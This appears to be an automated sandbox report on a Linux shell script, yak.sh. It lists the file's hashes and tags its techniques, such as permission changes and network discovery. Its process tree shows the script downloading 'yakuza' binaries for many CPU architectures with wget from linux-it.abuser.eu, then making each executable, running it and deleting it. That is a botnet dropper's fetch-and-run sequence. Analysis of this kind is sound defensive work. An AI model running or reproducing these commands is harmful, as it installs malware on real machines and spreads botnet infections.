Analysis
-
max time kernel
5s -
max time network
35s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
23-11-2024 23:57
Static task
static1
Behavioral task
behavioral1
Sample
yak.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
yak.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
yak.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
yak.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
yak.sh
-
Size
2KB
-
MD5
f50f60f970a5203dad27c480da7b4519
-
SHA1
f50f26900efe72f11c37767b5db9a3916a7c76b4
-
SHA256
ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf
-
SHA512
40c118ed8e7b22ba4c439cc3de9a9d69d7cccd9b4d109b00a716ea564379e001304edaffb0f9ca143e87cb0138f566aebea2e998b76c9bb4b653cf7a191e4ddd
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 9 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 685 chmod 700 chmod 672 chmod 679 chmod 692 chmod 696 chmod 704 chmod 653 chmod 663 chmod -
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
yakuza.mipsrmwgetyakuza.mipselrmwgetpid process 655 yakuza.mips 657 rm 659 wget 665 yakuza.mipsel 666 rm 644 wget
Processes
-
/tmp/yak.sh/tmp/yak.sh1⤵PID:642
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.mips2⤵
- System Network Configuration Discovery
PID:644
-
-
/bin/chmodchmod +x yakuza.mips2⤵
- File and Directory Permissions Modification
PID:653
-
-
/tmp/yakuza.mips./yakuza.mips2⤵
- System Network Configuration Discovery
PID:655
-
-
/bin/rmrm -rf yakuza.mips2⤵
- System Network Configuration Discovery
PID:657
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.mipsel2⤵
- System Network Configuration Discovery
PID:659
-
-
/bin/chmodchmod +x yakuza.mipsel2⤵
- File and Directory Permissions Modification
PID:663
-
-
/tmp/yakuza.mipsel./yakuza.mipsel2⤵
- System Network Configuration Discovery
PID:665
-
-
/bin/rmrm -rf yakuza.mipsel2⤵
- System Network Configuration Discovery
PID:666
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.sh2⤵PID:669
-
-
/bin/chmodchmod +x yakuza.sh2⤵
- File and Directory Permissions Modification
PID:672
-
-
/tmp/yakuza.sh./yakuza.sh2⤵PID:673
-
-
/bin/rmrm -rf yakuza.sh2⤵PID:674
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.x862⤵PID:676
-
-
/bin/chmodchmod +x yakuza.x862⤵
- File and Directory Permissions Modification
PID:679
-
-
/tmp/yakuza.x86./yakuza.x862⤵PID:681
-
-
/bin/rmrm -rf yakuza.x862⤵PID:682
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.arm62⤵PID:683
-
-
/bin/chmodchmod +x yakuza.arm62⤵
- File and Directory Permissions Modification
PID:685
-
-
/tmp/yakuza.arm6./yakuza.arm62⤵PID:686
-
-
/bin/rmrm -rf yakuza.arm62⤵PID:687
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.i6862⤵PID:688
-
-
/bin/chmodchmod +x yakuza.i6862⤵
- File and Directory Permissions Modification
PID:692
-
-
/tmp/yakuza.i686./yakuza.i6862⤵PID:693
-
-
/bin/rmrm -rf yakuza.i6862⤵PID:694
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.ppc2⤵PID:695
-
-
/bin/chmodchmod +x yakuza.ppc2⤵
- File and Directory Permissions Modification
PID:696
-
-
/tmp/yakuza.ppc./yakuza.ppc2⤵PID:697
-
-
/bin/rmrm -rf yakuza.ppc2⤵PID:698
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.i5862⤵PID:699
-
-
/bin/chmodchmod +x yakuza.i5862⤵
- File and Directory Permissions Modification
PID:700
-
-
/tmp/yakuza.i586./yakuza.i5862⤵PID:701
-
-
/bin/rmrm -rf yakuza.i5862⤵PID:702
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.m68k2⤵PID:703
-
-
/bin/chmodchmod +x yakuza.m68k2⤵
- File and Directory Permissions Modification
PID:704
-
-
/tmp/yakuza.m68k./yakuza.m68k2⤵PID:705
-
-
/bin/rmrm -rf yakuza.m68k2⤵PID:706
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.arm42⤵PID:707
-